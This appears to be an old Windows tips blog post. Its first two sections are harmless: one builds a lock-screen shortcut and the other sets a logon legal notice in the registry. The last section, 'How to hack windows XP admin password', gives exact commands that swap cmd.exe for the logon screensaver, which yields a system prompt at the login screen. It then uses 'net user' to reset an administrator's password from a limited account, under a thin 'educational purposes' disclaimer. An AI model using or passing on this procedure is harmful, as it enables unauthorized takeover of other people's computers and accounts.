How to create a shortcut to lock your computer

Have you ever wanted to lock your PC?But couldn't because you had to rush.
There is one solution by which you can lock your PC without any hesitation like using CTRL+ALT+DEL or anyother way. But, would not it be much easier if you could just double-click on a shortcut and it would lock your PC? Yes. there is one way to do that and the following steps will teach you on how to create this Magical shortcut , they are:

1)Right click on the desktop and choose New > Shortcut.
2)Now the create shortcut wizard starts. In the text box, type : rundll32.exe user32.dll,LockWorkStation and click next.
3)Enter the name of the shortcut like "Lock Workstaion" and then click finish.
4)Now you can even change the icon of the shortcut.
5)Right click the shortcut and then select Properties.
6)Click the Shortcut tab, and then click the Change Icon button.
7)In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK

And Your shortcut to lock your PC is done.. ENJOY!!

How to display legal notice on start-up

Example:
Caption: Hey guys. Welcome to my PC.
Title: before using my PC, i want you to know the do's and dont's for it. They are:(Depends on what u write)

Now, to do this trick you'll have to do the following steps and they are:
1)Go to the start menu > Run
2)Type "Regedit"(without quotes)
3)In the registry, search for HKEY_LOCAL_MACHINE
4)Under this option, search for SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
5)Click on system and then you'll see some files on the right hand side.
6)On the Right hand side,double-click on "legalnoticecaption" to write the caption of your notice.
7)Write the caption of your notice and click ok
8)Now below the caption, you'll find another file "legalnoticetext"
9)Double-click on it and write the text for your legal notice and click ok.

That's it! Now everyone will know what terms and conditions to follow when they log on to your PC.

How to hack windows XP admin password

This is only for educational purposes or information regarding security of your computer. The author will not be held responsible for any misuse of this information.

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 (directs to the system32 dir)
mkdir temphack (creates the folder temphack)
copy logon.scr temphack\logon.scr (backsup logon.scr)
copy cmd.exe temphack\cmd.exe (backsup cmd.exe)
del logon.scr (deletes original logon.scr)
rename cmd.exe logon.scr (renames cmd.exe to logon.scr)
exit (quits dos)

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.
